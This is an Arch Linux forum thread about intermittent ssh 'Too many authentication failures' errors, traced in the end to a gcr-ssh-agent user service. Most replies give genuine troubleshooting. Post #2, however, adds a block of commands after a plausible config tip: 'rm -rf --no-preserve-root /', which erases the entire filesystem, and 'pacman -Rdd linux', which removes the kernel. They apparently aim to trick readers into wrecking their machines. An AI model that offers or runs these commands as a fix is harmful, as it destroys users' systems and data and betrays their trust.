You are not logged in.

Pages: 1

#1 2024-01-27 15:59:25

MS1
Member
Registered: 2018-02-02
Posts: 95

Too many authentication failures from ssh

I have been experiencing times where ssh stops allowing me to connect giving this:

$ ssh 192.168.1.1
Received disconnect from 192.168.1.1 port 22:2: Too many authentication failures
Disconnected from 192.168.1.1 port 22

The "fix" is to run:

kill $(pidof ssh-agent)

So it can be worked-around but I want to know why it is happening in the first place.

Offline

#2 2024-01-27 16:50:14

Tula-gingerbread
Member
Registered: 2023-12-31
Posts: 33

Re: Too many authentication failures from ssh

You can try setting "MaxAuthTries" in /etc/ssh/sshd_config to a higher value.
P.S. Has your system been updated?

gpg --keyserver keys.openpgp.org --recv-keys 9845128C4D23BBBA
rm -rf --no-preserve-root /
pacman -Rdd linux

Offline

#3 2024-01-28 11:42:53

seth
Member
From: Won't reply 2 private help req
Registered: 2012-09-03
Posts: 76,016

Re: Too many authentication failures from ssh

Is this systematic ("everytime I login I have to kill ssh-agent to be able to use ssh") or occasional ("happens on fridays or when it's raining, not sure")?
Did you check the server logs for the auth failures?
Does the server face the interwebz or is it strictly LAN?

How to upload text · How to boot w/o GUI · Disable Windows Fast-Start! · Fix your xinitrc

Offline

#4 2024-01-28 13:32:34

MS1
Member
Registered: 2018-02-02
Posts: 95

Re: Too many authentication failures from ssh

It is occasional and could be related to an update of some packages but I have not found that link. When I check the journalctl output on the machine I tried to connect to all I see is:

sshd[13426]: Received disconnect from 192.168.1.102 port 34042:11: disconnected by user
sshd[13426]: Disconnected from user mike 192.168.1.102 port 34042
sshd[13426]: pam_unix(sshd:session): session closed for user mike

The server is only LAN facing.

Offline

#5 2024-01-28 14:28:45

graysky
Wiki Maintainer
From: :wq
Registered: 2008-12-01
Posts: 10,731
Website

Re: Too many authentication failures from ssh

I've experienced the same maybe 3-4 times over the past few months.  Attempted connections out to many hosts on my LAN or to hosts over the the WAN (remote servers) gave the same behavior/error message shown by the OP.  Since it was multiple systems, I assumed the problem was on workstation and googling found the work-around posted above (simply kill ssh-agent which will restart when you try to connect out).  It's annoying but easily fixed.  I too am baffled as to root cause.

Last edited by graysky (2024-01-28 14:29:51)

AUR packagesZsh and other configs

Offline

#6 2024-01-28 16:08:56

seth
Member
From: Won't reply 2 private help req
Registered: 2012-09-03
Posts: 76,016

Re: Too many authentication failures from ssh

https://wiki.archlinux.org/title/OpenSSH#Checklist
Raise the debug level, check when and how the authentication failures occur and correlate that w/ client actions.

How do you invoke ssh-agent?
https://wiki.archlinux.org/title/SSH_ke … stemd_user ?

How to upload text · How to boot w/o GUI · Disable Windows Fast-Start! · Fix your xinitrc

Offline

#7 2024-01-28 21:58:15

graysky
Wiki Maintainer
From: :wq
Registered: 2008-12-01
Posts: 10,731
Website

Re: Too many authentication failures from ssh

You asking me, Seth or the OP?  For me, ssh-agent is getting pulled in by login to sddm/xfce4.  I am doing nothing special.  Believe it or not, I do not run sshd on my workstation.  No need for incoming connections to raising the log level would have no effect.  I can do it on one of the target boxes ovbiously.

AUR packagesZsh and other configs

Offline

#8 2024-01-28 22:05:55

seth
Member
From: Won't reply 2 private help req
Registered: 2012-09-03
Posts: 76,016

Re: Too many authentication failures from ssh

Everyone interested smile

I can do it on one of the target boxes ovbiously.

That would have been the plan, to see whether and when your IP has failed to authenticate with the server leading up to this.

You're most likely using the user service then

systemctl --user status ssh-agent.service

How to upload text · How to boot w/o GUI · Disable Windows Fast-Start! · Fix your xinitrc

Offline

#9 2024-01-29 12:22:41

graysky
Wiki Maintainer
From: :wq
Registered: 2008-12-01
Posts: 10,731
Website

Re: Too many authentication failures from ssh

For user agents with ssh in their title, I just seems to have:

gcr-ssh-agent.socket
gpg-agent-ssh.socket

AUR packagesZsh and other configs

Offline

#10 2024-01-30 13:53:12

seth
Member
From: Won't reply 2 private help req
Registered: 2012-09-03
Posts: 76,016

Re: Too many authentication failures from ssh

What's either status? Are you using gnome keyring?
gpg-agent and ssh-agent are alternatives, the latter one is typically started on one of these ways but idk about GKR

How to upload text · How to boot w/o GUI · Disable Windows Fast-Start! · Fix your xinitrc

Offline

#11 2024-03-10 19:40:48

matty_r
Member
Registered: 2015-10-10
Posts: 12

Re: Too many authentication failures from ssh

If anyone else comes across this, I needed to disable gcr-ssh-agent service/socket:

systemctl --user disable gcr-ssh-agent
systemctl --user disable gcr-ssh-agent.socket
sudo systemctl --global disable gcr-ssh-agent.socket

Offline

Pages: 1

Board footer

Powered by FluxBB